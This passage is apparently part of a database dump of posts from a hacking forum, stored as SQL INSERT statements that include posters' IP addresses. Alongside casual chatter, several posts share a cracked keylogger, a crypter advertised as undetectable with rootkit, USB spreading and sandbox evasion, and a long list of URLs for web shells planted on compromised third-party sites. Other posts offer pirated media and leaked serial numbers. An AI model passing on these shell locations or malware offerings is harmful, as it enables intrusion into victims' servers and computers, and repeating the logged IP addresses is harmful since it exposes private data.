'27f9a6dca3a96d2d82659a87987c28d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6699', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351635046', '20/10 Sexy ass monkey! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '02fe4ee72b6a68f4363cf921396f46a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6700', '900', '6285', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1351638587', '[quote=\'Jacob\' pid=\'6285\' dateline=\'1351109621\'] No, just browsing around, and yeah I will try to be active here :) [/quote] Your Signature is Done. Check your inbox', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8dd307c38b53ad6bf95806fb29c49685', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6701', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '257', 'XxTREYZxX', '1351642546', 'Welcome my fellow freind enjoy stay and be active', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '0574ea01109e32e6f5e8d15b151385d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6702', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351642940', 'Yeah i will sure contact you when i not busy :P', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '1efde69df96396cfc39d68905f7ff450', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6703', '1142', '6684', '24', 'RE: Fuck you Internet Explorer', '0', '257', 'XxTREYZxX', '1351643022', 'yeah i use chrome its way beast very quick and convenient', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '02a187829c25fddb5271f7e6e3af8ed0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6704', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '257', 'XxTREYZxX', '1351643083', 'I have never heard these people ,i will listen to them and see if i like them :O', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '7865dc1fb0cf69e9f7cbe1208526e75e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6705', '1143', '0', '24', 'NEED HELP', '0', '257', 'XxTREYZxX', '1351643773', 'Hey LH, I need your help, recently i was playing minecraft online and all of a sudden it just disconnected,So i went to connect again and it connected but had a little yellow sign and it says no internet access.And when i go to connect to the internet it says webpage not available if any knows a solution please post below Thank you and that\'s why i haven\'t been active lately because i have to go to my friends house to go on :(', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '520e5728ed7c41267a28ec447311e280', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6706', '1144', '0', '11', 'What can you do with?', '0', '306', 'CommandoModz', '1351648215', 'What can you do with someone`s IP?', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '20ae07fc8fda1142e355f0cbffdb7298', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6707', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '306', 'CommandoModz', '1351648312', 'Wow, this is a really helpful share! Thanks mate! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', 'b5b65b225b8a9c0746d7fd99836d57e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6708', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '2', 'Apathy', '1351648942', 'Nice share I will not be downloading but sounds cool.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'ae5bea488c35edd8dd6c6129ad14684e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6709', '1145', '0', '42', 'Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '5', 'Timmy', '1351651713', '[align=center][align=left][font=Times New Roman][size=medium] [/size][/font][/align][align=left][u][font=Times New Roman][size=medium]Information[/size][/font][/u][/align][align=left][u][font=Times New Roman][size=medium] [/size][/font][/u][/align][align=left][font=Times New Roman][size=medium]Hello LH members. I provide you with Kim K\'s sex tape. I got it off a guy who actually purchased it. The file is clean but it is too big to scan. Enjoy![/size][/font][/align][align=left][font=Times New Roman][size=medium] [/size][/font][/align][align=left][font=Times New Roman][size=medium][u]Link to Download[/u][/size][/font][/align][align=left][font=Times New Roman][size=medium][u] [/u][/size][/font][/align][align=left][font=Times New Roman][size=medium][url=http://db.tt/LEN4FRNm]Here[/url] or [url=http://db.tt/LEN4FRNm]Here[/url] [/size][/font][/align][/align] Found this on HMSEF.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4806ce3d253340bdc62d258bb56b6f2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6710', '1146', '0', '72', 'DO NOT BUY NFS Most Wanted', '0', '5', 'Timmy', '1351652654', 'I pre-ordered Need for Speed Most Wanted Limited Edition and got it today. This NFS release sucked, was not even close to the old most wanted. [b]Why I hate this release?[/b] - Has no storyline - In race they are no directions telling you where to turn. - You can only use the unlocked stuff such as NOS etc only on one car. - Roads have too many sharp turns - Has no race startline; Cars are already on 50+ MPH when the race starts - You don\'t need to beat the backlist member, just reach the amount of points then you are done. - Police cars are stronger and faster than your cars. - Police start chasing you from your third race. - Music Sucks - You don\'t earn any money to purchase shit, you unlock cars by spotting a car around and clicking drive. - If you are driving 80 MPH and if you hit something then you \"crash\" and wait for the car to get reseted for 3 seconds and even if your opponent out of the map, when your car resets they are way infront of you. - Maps aren\'t clear. - Mostly drive to all your race points [b]NEED FOR SPEED MOST WANTED LIMITED EDITION IS A WASTE OF MONEY[/b]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'efc1ad399e7489bedf9695b655a6d360', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6711', '1120', '6530', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '5', 'Timmy', '1351652929', '[quote=\'iTzIpod\' pid=\'6530\' dateline=\'1351394655\'] Legit. Actually works! :) Thanks for the method. VOUCH. :) It\'s not really a Skype premium though.. It only allows you to call a group with a certain amount of people or whatever. [img]http://i.imgur.com/nsolw.png[/img] [/quote] http://www.free[b]group[/b]videocallingskype.com/ The site is about group so I think it only allows group calling but Hover said that on skype.com it says premium.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9021402071281db599e56a6d60bc7390', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6712', '1127', '6590', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '5', 'Timmy', '1351653099', '[quote=\'PiXEL^OG\' pid=\'6590\' dateline=\'1351524858\'] [quote=\'mothered\' pid=\'6588\' dateline=\'1351508425\'] I\'ve heard hackers get hired by big corporations, to help protect their systems and business. This doesn\'t surprise me. [/quote] MI5 and 6 are taking a piss , its known by everyone that they have been highly unorganized throughout time [/quote] I agree with both the above statements but once again not surprised as all the big companies including online sites hire hackers to secure their website.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7f569c8850d373afac22b94e0f5867a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6713', '1020', '6654', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '1', 't3h jok3r', '1351654586', 'This works, I use the very same method to keep my Ipods battery last more longer. Won\'t work much on an Ipone because of the calls and SMS. [quote=\'iTzIpod\' pid=\'6654\' dateline=\'1351560347\'] Stop talking about me! :( Nah I joke. Fix the MyCode in your OP. [/quote] That was my first thought when I saw this thread lol.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'af8094de047c6bca88f6c48c80557436', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6714', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '257', 'XxTREYZxX', '1351654773', 'Thanks for the heads up ,i was going to buy this :L', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'bd517a0da7d20d160829d2bc4a37b5f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6715', '1097', '6358', '9', 'RE: Monetizing e-book', '0', '7', 'Romdu62', '1351656915', 'What\'s neobux and why is your link not clickible?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '37847e9541f9de9ae13535a43dc92d37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6716', '1147', '0', '9', 'BRAIN FREEZE - Moneymaking Method', '0', '7', 'Romdu62', '1351656958', 'A simple yet effective money making method on my Desktop http://hidemyass.com/files/49bNJ/', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e9933c2e665cac8c8e23224346a77473', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6717', '1097', '6358', '9', 'RE: Monetizing e-book', '0', '257', 'XxTREYZxX', '1351657101', 'Just copy and paste it and neobux is a site where you can earn money', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '29082743552699f342d1c459b06f5c6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6718', '1148', '0', '30', '[Crack] Limitless Logger 6.7 !!', '0', '5', 'Timmy', '1351657206', '[align=center][url=http://i.imgur.com/NdEtT.png]#Proof[/url] First of all the VT : [align=center] [url=https://www.virustotal.com/file/454955e07fe8b3f485b54bdd057bb9a33e7f5e6140ffbc85a566c3583a58d4db/analysis/1351074984/][img]https://www.virustotal.com/static/img/logo-small.png[/img][/url] [img]http://i.imgur.com/3Z7lJ.png[/img][/align] [align=center] [img]http://i.imgur.com/3HVme.png[/img][/align] Download: http://www.ge.tt/#!/1FvwF8Q/v/0[/align]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '63d1542965035059c0cfcc4888e7737c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6719', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '257', 'XxTREYZxX', '1351657213', 'Thanks for the great share mate ,will not be downloading it', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '021f39fa5f98a87975269744ecda72a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6720', '1121', '6524', '20', 'RE: JodMod Crypter 1/35 cracked', '0', '5', 'Timmy', '1351657358', 'What\'s wrong with people? Why don\'t they comment on the best thread ever?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '214c7ddd6ceb389bbde482a3b79701d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6721', '1148', '6718', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '257', 'XxTREYZxX', '1351657517', 'Thanks for the share i will use this>', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '6005d406a8fc4414ceaf4b39a63d4aa5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6722', '1149', '0', '20', '[AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '5', 'Timmy', '1351657530', '[img]http://i.imgur.com/7EPnB.png[/img] Features : sRootKit >> [Hot] Small RootKite , Hidden task-manager All HDD Spread >>[Hot] With .lnk and .jpg files C & D and others USB Spread >> [Hot] With .lnk and .jpg files in USB drive Bypass VM\'s << not process detection ^_^ Bypass Sandbox << even if you got it just intalled Crypted server wont work Bypass Anubis: Analyzer Bypass ThreatExperet and much more ^^ Tested on : XtreamRAT Stealer Dark Comet Black Shades Cyber Gate PythoRAT Bozok RAT TinyRAT Bifrost Poison Ivy Tested on : Win7 64bit Win7 32bit Win Xp Sp3 Win Xp Sp2 [url=http://elementscanner.com//?RE=4b698b73d06b0484c9bb996bd9e85214]SCAN[/url] [url=http://linkc.at/OSmWla]download[/url] [quote] Pass: 2faa02c8124bcc128f3af587f4ff88da Cracked by Kamz89, password is \"stilldo\" [/quote]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '00bbd0ec02b172dbe7025bed40d21208', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6723', '1146', '6714', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '5', 'Timmy', '1351657591', '[quote=\'XxTREYZxX\' pid=\'6714\' dateline=\'1351654773\'] Thanks for the heads up ,i was going to buy this :L [/quote] No problem. Thank god I was able to save atleast one persons money.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a45a4459d01731f43338801eda90a453', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6724', '1121', '6524', '20', 'RE: JodMod Crypter 1/35 cracked', '0', '257', 'XxTREYZxX', '1351657691', 'Thanks for the great share mate i just saw this thread,please help me on my thread here: http://l33thacking.net/thread-1143.html', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '010048033027f13b84f1b2b19c73a896', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6725', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '257', 'XxTREYZxX', '1351657746', 'Yeah i was going to buy it this weekend,thanks again', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'd8b55ca374d9e53a5adfc6b97ed10ec3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6726', '1150', '0', '18', 'Facebook Creator', '0', '5', 'Timmy', '1351657787', '[align=center][b] FB Creator 3[/b][/align] [img]http://i47.tinypic.com/54ewih.jpg[/img] https://www.dropbox.com/s/aulj45zys5zpydx/FB%20Creator%203.rar VT: 2/42 https://www.virustotal.com/file/405573150db9629e382847ad707299ac9d75a160ca49ff9006bb669a3c957dbf/analysis/1351347149/ [color=#FF0000][b]i had not checked this so it is recommended that you run it in sandbox , i had added VT scan though[/b][/color]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f42d29c4a74db974b7bbd2a3e0a98f2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6727', '1149', '6722', '20', 'RE: [AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '257', 'XxTREYZxX', '1351657797', 'Thanks for this i will defiantly use this', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '66516210904b3654f673316566e41d8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6728', '1150', '6726', '18', 'RE: Facebook Creator', '0', '257', 'XxTREYZxX', '1351657845', 'HAHA Thanks for this (time to troll)hha', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '619e7148236df2e9be4ce94a36af53dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6729', '1151', '0', '18', 'Instaflow [Instagram bot] [Gold Version]', '0', '9', 'p420', '1351657882', 'Features *Superlike (~900-1000 per hour) *Automatic liking by hashtag *(~900-1000 per hour) *Live-Picture preview *Taglist Grabber *Quick Guide (6 pages) Don\'t forget to say thanks Download: http://www.mediafire.com/?tba27zio2136bne', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b5d6f4394095b8dba324f2afe810aa82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6730', '1152', '0', '21', 'Private Hard Hitting Shells', '0', '9', 'p420', '1351657971', 'Theses are all checked. [b]Brand New made by me[/b] http://www.phero404.us/private/404.php http://www.phero404.us/private/lol.php http://www.phero404.us/private/boobs.php http://www.phero404.us/private/shell.php http://www.phero404.us/private/xbox.php [b]Not made by me[/b] [code] http://173.201.177.81/wp-content/themes/...en/404.php http://174.120.140.164/wp-content/themes...en/404.php http://178.251.194.190/wp-content/themes...en/404.php http://nafsiahasa.com/up/x.php http://antik.si/cache/ssu/products/c.php http://161.139.194.77/webdav/shell74205.php http://ragersfantasy.com/bigbb.php http://161.139.194.77/webdav/shell38452.php http://201.144.204.153/grn.php http://161.139.194.77/webdav/shell74205.php http://kaodenuit.free.fr/post.php http://www.nafsiahasa.com/up/x.php http://gabriel-vores-engel.dk/404.php http://yogevbarans.my3gb.com/red.php http://kinderfysiotherapieconnyoortwijn.nl/404.php http://visualfoodplanner.com/404.php http://charminarconnection.org/js/Client...ts/pp1.php http://67.55.108.101/ http://82.233.159.108/swerve.php http://buchsermusic.org/js/ClientAPITests/pp4.php http://62.119.49.36/webdav/hak.php http://200.37.255.246/webdav/shell.php http://74.81.64.77/ http://kroll.dk/Shell.php http://tolva.dk/Shell.php http://www.atwservice.com/media.php http://engstroem.com/Shell.php http://220.132.241.53/webdav/lol.php http://174.120.140.164/wp-content/themes...en/404.php http://178.251.194.190/wp-content/themes...en/404.php http://nafsiahasa.com/up/x.php http://antik.si/cache/ssu/products/c.php http://161.139.194.77/webdav/shell74205.php http://www.jrnickz.com/help.php http://erbil.at/js/jquery.php http://mmx2.webs.com/shell.php http://mmx1.webs.com/shell.php http://mapi.co.kr/zb41pl7/bbs/data/mapi_...ttings.php http://94.94.216.82/grn.php [/code]', '72.231.24.165', '1223104677', '0', '0', '9', '1351658072', '1', '784b39616739c0f9f00df5c1ad2559c6', '0', '1351658072'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6731', '1152', '6730', '21', 'RE: Private Hard Hitting Shells', '0', '257', 'XxTREYZxX', '1351658233', 'Thanks for this great share LOl', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'b176b6957ba90288ee02b9a5c4632a1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6736', '1086', '6316', '75', 'RE: Skyrim Cheats and tips', '0', '262', 'RAND0M1ZER', '1351659566', 'A buddy of mine has a youtube channel with plenty of Skyrim videos, some of his vids are pretty good Check it out: http://www.youtube.com/user/fatalmaverick?feature=g-user-s', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '740935f958567d0757404e94f5c6f8ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6733', '1153', '0', '64', 'Watch Prison Break full online for free', '0', '9', 'p420', '1351658400', 'Here is a great site to watch all prison break episodes. Link: http://www.free-tv-video-online.me/internet/prison_break/ [b]Prison Break[/b] [b]Description: [/b]An engineer (Wentworth Miller) installs himself in a prison he helped design, in order to help his brother (Dominic Purcell), a death-row inmate who insists he did not commit the crime for which he has been sentenced to die and help him escape. Lincoln Burrows is on death row for the murder of the vice president\'s brother. He insists he\'s innocent and only his brother Michael Scofield believes him. As an engineer who helped design the prison where Lincoln is being held, Michael takes drastic measures to help his brother. He gets himself arrested and sent to the same prison so that with his knowledge of the building the two of them can escape together. However, while inside, Michael discovers a massive conspiracy that is determined to see Lincoln\'s sentence carried out. Breaking out will be more difficult than he thought, but he\'s still going to try. [b]Season(s):[/b] 4 [b]Genres:[/b] Action, Crime, Drama', '72.231.24.165', '1223104677', '0', '0', '9', '1351658422', '1', '048f0b0b2cb8399c140b7d62e957e9e1', '0', '1351658422'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6734', '1154', '0', '43', 'Iphone 5 serials', '0', '9', 'p420', '1351658625', 'Here\'s some iPhone 5 serials by A?????x™ Enjoy. [code] C37J9SRDDTWD C37J9SXDDTWD C37J9SFDDTWD C37J9STDDTWD C37J9SSDDTWD C37J9SYDDTWD C37J9SCDDTWD C37J9SBDDTWD C37J9SVDDTWD C37J9SVUDTWD C37J9SWUDTWD C37J9GWUDTWD C37J9GEUDTWD C38J9GEUDTWD C38J9EEUDTWD C38J9EEUDTWF C38J9YEUDTWF C38J9HEUDTWF C38J9JEUDTWF C38J9JEUDTWG C38J9JEUDTWD C38J9JESDTWD C38J9CESDTWD C38J9CEPDTWD C38J9CWPDTWD C38J9EWPDTWD C35J9EWPDTWD C36J9EWPDTWD C37J9EWPDTWD C38J9EWPDTWD C38J8EWPDTWD C38J8PWPDTWD C38J8DWPDTWD C38J8DPPDTWD C38J8DPDDTWD C38J8DPWDTWD C38J8DRWDTWD C38J8DRWDTWF C38J8DRCDTWF C38J8DRBDTWF C38J8DRUDTWF C38J8DRQDTWF C38J8DRGDTWF C38J8DRZDTWF C38J8DRNDTWF C38J9DRGDTWF C38J9DEGDTWF C38J7DFGDTWF C38J7PRGDTWF C38J7PCCDTWF C38J7ACGDTWF C38J7BCGDTWF C38J7ZCGDTWF C38J7HCGDTWF C38J7TCGDTWF C38J7XCPDTWF C38J7XCADTWF C38J7XCBDTWF C38J7XCHDTWF C38J7XCYDTWF C38J7XCRDTWF C38J7XDRDTWF C38J7XCCDTWF C39J7XCUDTWF C39J7XCPDTWF C39J7ZCPDTWF C39J7WCPDTWF C38J7WCPDTWF C38J7WCCDTWF C38J7WPCDTWF C38J7W3CDTWF C38J7W2CDTWF C38J7W3CDTWF C38J7W4CDTWF C38J7W5CDTWF C38J7W7CDTWF C38J7WQCDTWF C38J731CDTWF C38J711CDTWF C38J721CDTWF C38J751CDTWF C38J771CDTWF C38J871CDTWF C38J872CDTWF [/code]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '639162e76ec3a7d83c0e327d8b1bfc7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6735', '1143', '6705', '24', 'RE: NEED HELP', '0', '9', 'p420', '1351659445', 'Maybe someone is hitting you offline? Also if you have an anti-virus then disable their firewall. That\'s what happens to me the most my internet gets limited access and it blocks chrome so it shows webpage unable sign everytime and check your windows firewall and allow ur internet browser.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'befb17c016d19463aeb1a0302cb3e56a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, 